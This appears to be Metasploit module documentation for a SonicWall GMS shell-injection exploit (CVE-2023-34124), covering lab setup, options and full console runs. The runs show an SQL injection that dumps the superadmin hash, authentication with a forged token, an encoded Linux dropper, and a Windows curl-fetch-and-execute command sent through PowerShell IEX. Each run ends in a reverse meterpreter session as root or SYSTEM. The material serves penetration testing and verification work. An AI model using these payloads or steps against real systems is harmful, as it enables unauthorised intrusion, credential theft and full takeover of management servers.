## Vulnerable Application

This affects SonicWall GMS 9.3.2-SP1 and earlier. That's build 9.3.9320 and
earlier (9.3.9330 is patched). You can get the software by creating a free
account on https://mysonicwall.com. Getting a demo license is a big involved,
but it should be roughly the following steps:

* Create an account at: https://www.mysonicwall.com/
* Download the Linux VM appliance or Windows EXE
* Install the application with defaults
* Visit the application in your browser
* The default creds are admin/password, but at some point you'll need to log in with your mysonicwall.com account
* Eventually you'll be asked the install a license
* Go back to https://www.mysonicwall.com
* On the left hand side menu go to "Product Management" -> "Trial Software"
* Scroll down to "GMS" click on "Try Now"
* Enter a "Friendly name" - this can be anything - click on "Try Now"
* You should see a success message
* Go to "My Products" on the left hand side (Note: this didn't load in Chrome in some cases)
* Your license should now be listed here. You may need to click the table's refresh icon within the UI, not the browser refresh button
* Click on the license and you'll get the serial number + auth code + etc. that you need
* Enter those in your browser
* Device should now be licensed

## Verification Steps

1. Install the application (see above)
2. Start `msfconsole`
3. Do `use exploit/multi/http/sonicwall_shell_injection_cve_2023_34124`
4. Set the appropriate `TARGET`, `RHOST`, `LHOST`, and possibly `FETCH_SRVHOST` (for Windows)
5. Do `run`
6. You should get meterpreter

## Options

### `TARGETURI` (default: `/`)

The base path to the target application. The default (`/`) should almost always
work.

### `WritableDir`

A writable directory on the target. We default to either `/tmp` for Linux or
`%TEMP%` on Windows.

### `ForceExploit`

By default, we ensure that the platform in the `TARGET` and the platform that
we detect are the same. If they are not, we fail out.

If this is set to `true`, we trust that the `TARGET` is set appropriately and
use that target OS for encoding the command.

## Scenarios

### Linux dropper

This is the default target, and will work against the Linux appliance with
its stripped-down environment. It writes a binary to `/tmp` (by default),
executes it, and deletes it. No special configuration should be necessary,
and you get `root` access:

```
msf > use exploit/multi/http/sonicwall_shell_injection_cve_2023_34124
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set RHOST 10.0.0.89
RHOST => 10.0.0.89
msf exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set LHOST 10.0.0.227
LHOST => 10.0.0.227
msf exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set VERBOSE true
VERBOSE => true
msf exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > exploit

[*] Started reverse TCP handler on 10.0.0.227:4444 
[*] Attempting to use SQL injection to grab the password hash for the superadmin user...
[*] Generated SQL injection: ' union select (select ID from SGMSDB.DOMAINS limit 1), '', '', '', '', '', (select concat(id, ':', password) from sgmsdb.users where active = '1' order by issuperadmin desc limit 1 offset 0),'', '', '
[*] Generated a token using built-in secret key: /J50ZtvLJddOf5FI4nYdMJcX8IQ=
[*] Sending SQL injection request to get the username/hash...
[+] Found an account: admin:5f4dcc3b5aa765d61d8327deb882cf99
[*] Grabbing server hashing token...
[*] Got the server-side token: 10638945083391156307247271263824
[*] Generated client token: de3787d4ac2f5db099666e6467b11c38
[*] Attempting to authenticate with the client token + password hash...
[+] Successfully logged in as admin (Linux detected!)
[*] Encoding (Linux) payload
[*] Encoded shell command: bash -c PLUS\=\$\(echo\ -e\ begin-base64\ 755\ a\\\\nKwee\\\\n\=\=\=\=\ \|\ uudecode\ -o-\)\;echo\ -e\ begin-base64\ 755\ /tmp/.ctdtzpxv\\\\nf0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA\$\{PLUS\}gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAAMf9qCViZthBIidZNMclqIkFaagdaDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXAoAAONRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp\$\{PLUS\}Wg8FSIXAeO3/5g\=\=\\\\n\=\=\=\=\ \|\ uudecode\ \;\ coproc\ /tmp/.ctdtzpxv\ \;\ rm\ /tmp/.ctdtzpxv
[*] Attempting to execute the shell injection payload
[+] Payload sent!
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 10.0.0.89
[*] Meterpreter session 1 opened (10.0.0.227:4444 -> 10.0.0.89:43566) at 2023-08-18 13:38:00 -0700

meterpreter > getuid
Server username: root
```

### Windows fetch

This is the best Windows target, and will work against installations on Windows
that have the `curl.exe` utility. It fetches and executes a payload using
encoded Powershell commands, granting `SYSTEM` access:

```
msf > use exploit/multi/http/sonicwall_shell_injection_cve_2023_34124
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set TARGET 1
TARGET => 1
msf exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set LHOST 10.0.0.227
LHOST => 10.0.0.227
msf exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set RHOST 10.0.0.79
RHOST => 10.0.0.79
msf exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set FETCH_SRVHOST 10.0.0.227
FETCH_SRVHOST => 10.0.0.227
msf exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set VERBOSE true
VERBOSE => true
msf exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > exploit

[*] Command to run on remote host: curl -so hQwPyfWWi.exe http://10.0.0.227:8080/jmQsj96o2bA9WhizsOs40Q & start /B hQwPyfWWi.exe
[*] Fetch Handler listening on 10.0.0.227:8080
[*] HTTP server started
[*] Adding resource /jmQsj96o2bA9WhizsOs40Q
[*] Started reverse TCP handler on 10.0.0.227:4444 
[*] Attempting to use SQL injection to grab the password hash for the superadmin user...
[*] Generated SQL injection: ' union select (select ID from SGMSDB.DOMAINS limit 1), '', '', '', '', '', (select concat(id, ':', password) from sgmsdb.users where active = '1' order by issuperadmin desc limit 1 offset 0),'', '', '
[*] Generated a token using built-in secret key: /J50ZtvLJddOf5FI4nYdMJcX8IQ=
[*] Sending SQL injection request to get the username/hash...
[.] Found an account: admin:5f4dcc3b5aa765d61d8327deb882cf99
[*] Grabbing server hashing token...
[*] Got the server-side token: 33936314922891192454547809769777
[*] Generated client token: e3a16584fcc8a8238c707300d8400917
[*] Attempting to authenticate with the client token + password hash...
[+] Successfully logged in as admin (Windows detected!)
[*] Encoding (Windows) command: curl -so hQwPyfWWi.exe http://10.0.0.227:8080/jmQsj96o2bA9WhizsOs40Q & start /B hQwPyfWWi.exe
[*] Running shell command: powershell IEX ([System.Text.Encoding]::UTF8.GetString([byte[]]@(99,109,100,46,101,120,101,32,47,99,32,99,117,114,108,32,45,115,111,32,104,81,119,80,121,102,87,87,105,46,101,120,101,32,104,116,116,112,58,47,47,49,48,46,48,46,48,46,50,50,55,58,56,48,56,48,47,106,109,81,115,106,57,54,111,50,98,65,57,87,104,105,122,115,79,115,52,48,81,32,34,38,34,32,115,116,97,114,116,32,47,66,32,104,81,119,80,121,102,87,87,105,46,101,120,101)))
[*] Client 10.0.0.79 requested /jmQsj96o2bA9WhizsOs40Q
[*] Sending payload to 10.0.0.79 (curl/7.83.1)
[+] Payload sent!
[*] Sending stage (200774 bytes) to 10.0.0.79
[*] Meterpreter session 1 opened (10.0.0.227:4444 -> 10.0.0.79:52692) at 2023-08-18 14:04:08 -0700

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```

### Windows command

The Windows target can also run a generic Windows payload. You won't see the
output, though.

```
msf > use exploit/multi/http/sonicwall_shell_injection_cve_2023_34124
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set TARGET 1
TARGET => 1
msf exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set PAYLOAD cmd/windows/generic
PAYLOAD => cmd/windows/generic
msf exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set RHOST 10.0.0.79
RHOST => 10.0.0.79
msf exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set CMD "echo hi > c:\\users\\administrator\\desktop\\test.txt"
CMD => echo hi > c:\users\administrator\desktop\test.txt
msf exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set DisablePayloadHandler true
DisablePayloadHandler => true
msf exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > exploit
[*] Attempting to use SQL injection to grab the password hash for the superadmin user...
[*] Generated SQL injection: ' union select (select ID from SGMSDB.DOMAINS limit 1), '', '', '', '', '', (select concat(id, ':', password) from sgmsdb.users where active = '1' order by issuperadmin desc limit 1 offset 0),'', '', '
[*] Generated a token using built-in secret key: /J50ZtvLJddOf5FI4nYdMJcX8IQ=
[*] Sending SQL injection request to get the username/hash...
[+] Found an account: admin:5f4dcc3b5aa765d61d8327deb882cf99
[*] Grabbing server hashing token...
[*] Got the server-side token: 35362425873079330798216049225958
[*] Generated client token: e304c909a4e69b49608777910338b8ba
[*] Attempting to authenticate with the client token + password hash...
[+] Successfully logged in as admin (Windows detected!)
[*] Encoding (Windows) command: echo hi > c:\users\administrator\desktop\test.txt
[*] Running shell command: powershell IEX ([System.Text.Encoding]::UTF8.GetString([byte[]]@(99,109,100,46,101,120,101,32,47,99,32,101,99,104,111,32,104,105,32,62,32,99,58,92,117,115,101,114,115,92,97,100,109,105,110,105,115,116,114,97,116,111,114,92,100,101,115,107,116,111,112,92,116,101,115,116,46,116,120,116)))
[+] Payload sent!
```

Validate:

```
msf exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set PAYLOAD cmd/windows/http/x64/meterpreter/reverse_tcp
PAYLOAD => cmd/windows/http/x64/meterpreter/reverse_tcp
msf exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set LHOST 10.0.0.227
LHOST => 10.0.0.227
msf exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set FETCH_SRVHOST 10.0.0.227
FETCH_SRVHOST => 10.0.0.227
msf exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set VERBOSE false
VERBOSE => false
msf exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > exploit

[*] Started reverse TCP handler on 10.0.0.227:4444 
[*] Sending SQL injection request to get the username/hash...
[+] Found an account: admin:5f4dcc3b5aa765d61d8327deb882cf99
[*] Attempting to authenticate with the client token + password hash...
[+] Successfully logged in as admin (Windows detected!)
[*] Sending stage (200774 bytes) to 10.0.0.79
[+] Payload sent!
[*] Meterpreter session 1 opened (10.0.0.227:4444 -> 10.0.0.79:52787) at 2023-08-18 14:13:11 -0700

meterpreter > ls c:\\users\\administrator\\desktop\\test.txt
100666/rw-rw-rw-  10  fil  2023-08-18 14:06:51 -0700  c:\users\administrator\desktop\test.txt
```

### Linux command

I also added a target for a Linux command. It works by writing the command to
a file then executing the file with the default shell (/bin/sh), which is
basically the same as the Linux dropper.

Like Windows, you won't see the output.

```
msf > use exploit/multi/http/sonicwall_shell_injection_cve_2023_34124
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set TARGET 2
TARGET => 2
msf exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set RHOST 10.0.0.89
RHOST => 10.0.0.89
msf exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set CMD 'touch /tmp/iassureyouiexecuted'
CMD => touch /tmp/iassureyouiexecuted
msf exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set VERBOSE true
VERBOSE => true
msf exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > exploit

[+] touch /tmp/iassureyouiexecuted
[*] Attempting to use SQL injection to grab the password hash for the superadmin user...
[*] Generated SQL injection: ' union select (select ID from SGMSDB.DOMAINS limit 1), '', '', '', '', '', (select concat(id, ':', password) from sgmsdb.users where active = '1' order by issuperadmin desc limit 1 offset 0),'', '', '
[*] Generated a token using built-in secret key: /J50ZtvLJddOf5FI4nYdMJcX8IQ=
[*] Sending SQL injection request to get the username/hash...
[+] Found an account: admin:5f4dcc3b5aa765d61d8327deb882cf99
[*] Grabbing server hashing token...
[*] Got the server-side token: 32069016763622082907123286615890
[*] Generated client token: 6988cba8e0f09a4289075c1c3f3d84a2
[*] Attempting to authenticate with the client token + password hash...
[+] Successfully logged in as admin (Linux detected!)
[*] Encoding (Linux) payload
[*] Encoded shell command: bash -c PLUS\=\$\(echo\ -e\ begin-base64\ 755\ a\\\\nKwee\\\\n\=\=\=\=\ \|\ uudecode\ -o-\)\;echo\ -e\ begin-base64\ 755\ /tmp/.whhkjilf\\\\ndG91Y2ggL3RtcC9pYXNzdXJleW91aWV4ZWN1dGVk\\\\n\=\=\=\=\ \|\ uudecode\ \;\ coproc\ /tmp/.whhkjilf\ \;\ rm\ /tmp/.whhkjilf
[*] Attempting to execute the shell injection payload
[+] Payload sent!
```

To validate:

```
msf exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set TARGET 0
TARGET => 0
msf exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set LHOST 10.0.0.227                         
LHOST => 10.0.0.227
msf exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set VERBOSE false
VERBOSE => false
msf exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > exploit

[*] Started reverse TCP handler on 10.0.0.227:4444 
[*] Sending SQL injection request to get the username/hash...
[+] Found an account: admin:5f4dcc3b5aa765d61d8327deb882cf99
[*] Attempting to authenticate with the client token + password hash...
[+] Successfully logged in as admin (Linux detected!)
[*] Attempting to execute the shell injection payload
[*] Sending stage (3045380 bytes) to 10.0.0.89
[+] Payload sent!
[*] Meterpreter session 1 opened (10.0.0.227:4444 -> 10.0.0.89:43883) at 2023-08-18 14:11:57 -0700

meterpreter > ls /tmp/iassure*
Listing: /tmp/iassure*
======================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100640/rw-r-----  0     fil   2023-08-18 14:10:21 -0700  iassureyouiexecuted
```
